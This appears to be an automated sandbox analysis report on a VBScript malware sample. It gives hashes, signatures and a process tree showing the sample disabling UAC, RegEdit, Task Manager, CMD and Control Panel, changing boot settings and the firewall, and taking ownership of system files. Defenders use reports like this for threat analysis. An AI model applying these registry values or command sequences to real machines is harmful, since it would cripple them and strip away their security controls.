Analysis
-
max time kernel
300s -
max time network
306s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 19:34
Static task
static1
Behavioral task
behavioral1
Sample
malware.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
malware.vbs
Resource
win10v2004-20240508-en
General
-
Target
malware.vbs
-
Size
7KB
-
MD5
9c18843bf13af2e38482ac3fe46f4290
-
SHA1
cc90dab75e362b455262c5e3b612b5dfb04f0b38
-
SHA256
adb740a4d2814f2fc7078d3a81c9c642cc13e9a77e728483b67e6ca668a2e373
-
SHA512
8dd8d17346f421c461ce66ca7c1ac9e75bd1c5628a0fa81dc4c59db1dcc7ab23b31d35f6c492ddfa3d862b67311559f6c2c5e4d923d40fdca94c313f1f53c797
-
SSDEEP
96:qD/+WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8ELzmdPzWdEKuWP2W9Nukim29mQ2:qD/UqrZgX7xXCdPidfbj2Qr
Malware Config
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 5940 bcdedit.exe 5956 bcdedit.exe 5748 bcdedit.exe 396 bcdedit.exe -
Creates new service(s) 2 TTPs
-
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 15 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 2688 netsh.exe 4432 netsh.exe 6140 netsh.exe 3312 netsh.exe 412 netsh.exe 6400 netsh.exe 6152 netsh.exe 2428 netsh.exe 3724 netsh.exe 5796 netsh.exe 6360 netsh.exe 3260 netsh.exe 3856 netsh.exe 5980 netsh.exe 6048 netsh.exe -
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 432 takeown.exe 5588 icacls.exe 6128 takeown.exe 5832 icacls.exe 5724 takeown.exe 5748 icacls.exe 5512 takeown.exe 5488 icacls.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 432 takeown.exe 5588 icacls.exe 6128 takeown.exe 5832 icacls.exe 5724 takeown.exe 5748 icacls.exe 5512 takeown.exe 5488 icacls.exe -
Drops file in System32 directory 21 IoCs
Processes:
OpenWith.exeOpenWith.exepowershell.exeOpenWith.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe -
Drops file in Windows directory 1 IoCs
Processes:
netsh.exedescription ioc process File created C:\Windows\rescache\_merged\431186354\3005941989.pri netsh.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 5972 sc.exe 5656 sc.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 6248 powershell.exe 2692 powershell.exe 900 powershell.exe 1880 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 6412 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeipconfig.exepid process 5988 ipconfig.exe 3620 ipconfig.exe 1880 ipconfig.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 6228 taskkill.exe 6348 taskkill.exe 6384 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exenetsh.exereg.exereg.exereg.exereg.exereg.exeOpenWith.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8\@{Microsoft.Windows.SecureAssessmentBrowser_10.0.19041.1023_neutra = "Take a Test" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@sstpsvc.dll,-35001 = "Secure Socket Tunneling Protocol" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d5acddea4e2414\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8\@{Microsoft.Windows.NarratorQuickStart_10.0.19041.1023_neutral_neutral_ = "Narrator" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\1d5acddeb9898a7\a01460c8\@{Microsoft.Windows.OOBENetworkCaptivePortal_10.0.19041.1023_neut = "Captive Portal Flow" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5366dd4697d\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2" reg.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8\@{Microsoft.LockApp_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp = "Windows Default Lock Screen" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a01460c8\@{Microsoft.Windows.Apprep.ChxApp_1000.19041.1023.0_neutral_neutral_cw5n1h2t = "Windows Defender SmartScreen" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a01460c8\@{Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy?ms-r = "Work or school account" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36864 = "WLAN Service - WFD Application Services Platform Coordination Protocol (Uses UDP)" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d7e53665b78b3b\a01460c8\@{Microsoft.Windows.ParentalControls_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy?ms-res = "Microsoft family features" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%systemroot%\system32\provsvc.dll,-202 = "HomeGroup" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8\@{Microsoft.XboxGameCallableUI_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy? = "Xbox Game UI" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableSettingsPage = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09" reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\International reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoExplorer = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8\@{Microsoft.AccountsControl_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://M = "Email and accounts" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9002 = "BranchCache - Hosted Cache Server (Uses HTTPS)" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8\@{Microsoft.Win32WebViewHost_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy?ms-reso = "Desktop App Web Viewer" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
powershell.exemsedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exemsedge.exepid process 2692 powershell.exe 2692 powershell.exe 2692 powershell.exe 3080 msedge.exe 3080 msedge.exe 4844 msedge.exe 4844 msedge.exe 5272 identity_helper.exe 5272 identity_helper.exe 900 powershell.exe 900 powershell.exe 900 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 1880 powershell.exe 6248 powershell.exe 6248 powershell.exe 6248 powershell.exe 3968 msedge.exe 3968 msedge.exe 2112 msedge.exe 2112 msedge.exe 4724 identity_helper.exe 4724 identity_helper.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
Processes:
msedge.exemsedge.exepid process 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exewhoami.exetakeown.exetakeown.exetakeown.exepowershell.exetaskkill.exetaskkill.exetaskkill.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exewhoami.exedescription pid process Token: SeShutdownPrivilege 2508 powercfg.exe Token: SeCreatePagefilePrivilege 2508 powercfg.exe Token: SeShutdownPrivilege 5048 powercfg.exe Token: SeCreatePagefilePrivilege 5048 powercfg.exe Token: SeShutdownPrivilege 888 powercfg.exe Token: SeCreatePagefilePrivilege 888 powercfg.exe Token: SeShutdownPrivilege 2704 powercfg.exe Token: SeCreatePagefilePrivilege 2704 powercfg.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 3956 whoami.exe Token: SeTakeOwnershipPrivilege 5724 takeown.exe Token: SeShutdownPrivilege 6100 powercfg.exe Token: SeCreatePagefilePrivilege 6100 powercfg.exe Token: SeShutdownPrivilege 6140 powercfg.exe Token: SeCreatePagefilePrivilege 6140 powercfg.exe Token: SeShutdownPrivilege 1572 powercfg.exe Token: SeCreatePagefilePrivilege 1572 powercfg.exe Token: SeShutdownPrivilege 4612 powercfg.exe Token: SeCreatePagefilePrivilege 4612 powercfg.exe Token: SeDebugPrivilege 900 powershell.exe Token: SeDebugPrivilege 5356 whoami.exe Token: SeTakeOwnershipPrivilege 5512 takeown.exe Token: SeTakeOwnershipPrivilege 432 takeown.exe Token: SeTakeOwnershipPrivilege 6128 takeown.exe Token: SeDebugPrivilege 1880 powershell.exe Token: SeDebugPrivilege 6228 taskkill.exe Token: SeDebugPrivilege 6348 taskkill.exe Token: SeDebugPrivilege 6384 taskkill.exe Token: SeShutdownPrivilege 1840 powercfg.exe Token: SeCreatePagefilePrivilege 1840 powercfg.exe Token: SeShutdownPrivilege 3724 powercfg.exe Token: SeCreatePagefilePrivilege 3724 powercfg.exe Token: SeShutdownPrivilege 1640 powercfg.exe Token: SeCreatePagefilePrivilege 1640 powercfg.exe Token: SeShutdownPrivilege 5024 powercfg.exe Token: SeCreatePagefilePrivilege 5024 powercfg.exe Token: SeDebugPrivilege 6248 powershell.exe Token: SeDebugPrivilege 900 whoami.exe -
Suspicious use of FindShellTrayWindow 50 IoCs
Processes:
msedge.exemsedge.exepid process 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe -
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
msedge.exemsedge.exepid process 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 4844 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe 2112 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exepid process 5916 OpenWith.exe 5728 OpenWith.exe 5724 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 1896 wrote to memory of 1804 1896 cmd.exe net.exe PID 1896 wrote to memory of 1804 1896 cmd.exe net.exe PID 1804 wrote to memory of 4780 1804 net.exe net1.exe PID 1804 wrote to memory of 4780 1804 net.exe net1.exe PID 1896 wrote to memory of 2508 1896 cmd.exe powercfg.exe PID 1896 wrote to memory of 2508 1896 cmd.exe powercfg.exe PID 1896 wrote to memory of 5048 1896 cmd.exe powercfg.exe PID 1896 wrote to memory of 5048 1896 cmd.exe powercfg.exe PID 1896 wrote to memory of 888 1896 cmd.exe powercfg.exe PID 1896 wrote to memory of 888 1896 cmd.exe powercfg.exe PID 1896 wrote to memory of 2704 1896 cmd.exe powercfg.exe PID 1896 wrote to memory of 2704 1896 cmd.exe powercfg.exe PID 1896 wrote to memory of 2692 1896 cmd.exe powershell.exe PID 1896 wrote to memory of 2692 1896 cmd.exe powershell.exe PID 1896 wrote to memory of 2428 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 2428 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 3856 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 3856 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 2688 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 2688 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 3724 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 3724 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 4432 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 4432 1896 cmd.exe netsh.exe PID 1896 wrote to memory of 2716 1896 cmd.exe reg.exe PID 1896 wrote to memory of 2716 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4328 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4328 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4476 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4476 1896 cmd.exe reg.exe PID 1896 wrote to memory of 2256 1896 cmd.exe reg.exe PID 1896 wrote to memory of 2256 1896 cmd.exe reg.exe PID 1896 wrote to memory of 2232 1896 cmd.exe reg.exe PID 1896 wrote to memory of 2232 1896 cmd.exe reg.exe PID 1896 wrote to memory of 3260 1896 cmd.exe reg.exe PID 1896 wrote to memory of 3260 1896 cmd.exe reg.exe PID 1896 wrote to memory of 3120 1896 cmd.exe reg.exe PID 1896 wrote to memory of 3120 1896 cmd.exe reg.exe PID 1896 wrote to memory of 1172 1896 cmd.exe reg.exe PID 1896 wrote to memory of 1172 1896 cmd.exe reg.exe PID 1896 wrote to memory of 2780 1896 cmd.exe reg.exe PID 1896 wrote to memory of 2780 1896 cmd.exe reg.exe PID 1896 wrote to memory of 3344 1896 cmd.exe reg.exe PID 1896 wrote to memory of 3344 1896 cmd.exe reg.exe PID 1896 wrote to memory of 5072 1896 cmd.exe reg.exe PID 1896 wrote to memory of 5072 1896 cmd.exe reg.exe PID 1896 wrote to memory of 3012 1896 cmd.exe reg.exe PID 1896 wrote to memory of 3012 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4304 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4304 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4348 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4348 1896 cmd.exe reg.exe PID 1896 wrote to memory of 840 1896 cmd.exe reg.exe PID 1896 wrote to memory of 840 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4052 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4052 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4624 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4624 1896 cmd.exe reg.exe PID 1896 wrote to memory of 1584 1896 cmd.exe reg.exe PID 1896 wrote to memory of 1584 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4676 1896 cmd.exe reg.exe PID 1896 wrote to memory of 4676 1896 cmd.exe reg.exe PID 1896 wrote to memory of 5008 1896 cmd.exe reg.exe PID 1896 wrote to memory of 5008 1896 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
